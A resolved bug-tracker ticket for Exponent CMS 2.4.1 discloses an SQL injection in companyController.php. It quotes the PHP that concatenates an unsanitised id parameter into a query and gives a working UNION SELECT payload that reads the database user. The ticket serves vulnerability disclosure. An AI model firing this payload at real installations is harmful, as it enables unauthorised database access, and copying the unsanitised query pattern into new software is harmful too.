#1407 ✓resolved

SQL Injection Vulnerability in Exponent CMS 2.4.1

Reported by Croxy | February 26th, 2017 @ 03:56 PM | in 2.4.2 (closed)

&id=1' UNION ALL SELECT 1,user(),1,1,1,1,1,1,1,1%23

In framework/modules/companyController.php

    function show()
//        global $db, $user, $router;
        global $user, $router;
        expHistory::set('viewable', $this->params);

        $count_sql_start = 'SELECT COUNT(DISTINCT p.id) as c FROM '.DB_TABLE_PREFIX.'_product p ';

        $sql_start  = 'SELECT DISTINCT p.* FROM '.DB_TABLE_PREFIX.'_product p ';
        //$sql = 'JOIN '.DB_TABLE_PREFIX.'_product_storeCategories sc ON p.id = sc.product_id ';
        $sql = 'WHERE ';
        if (!$user->isAdmin()) $sql .= '(p.active_type=0 OR p.active_type=1) AND ' ;
        //$sql .= 'sc.storecategories_id IN (';
        //$sql .= 'SELECT id FROM '.DB_TABLE_PREFIX.'_storeCategories WHERE rgt BETWEEN '.$this->category->lft.' AND '.$this->category->rgt.')';
        $sql .=  'p.companies_id=' . $this->params['id'];
        $sql .=  ' AND p.parent_id = 0';

        $count_sql = $count_sql_start . $sql;
        $sql = $sql_start . $sql;
        $order = 'id'; //$this->config['orderby'];
        $dir = 'DESC'; //$this->config['orderby_dir'];

I can control $this->params['id'],I can use this parameter for sql injection

Line 118:

            'record'=>new company($this->params['id']),

Comments and changes to this ticket

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket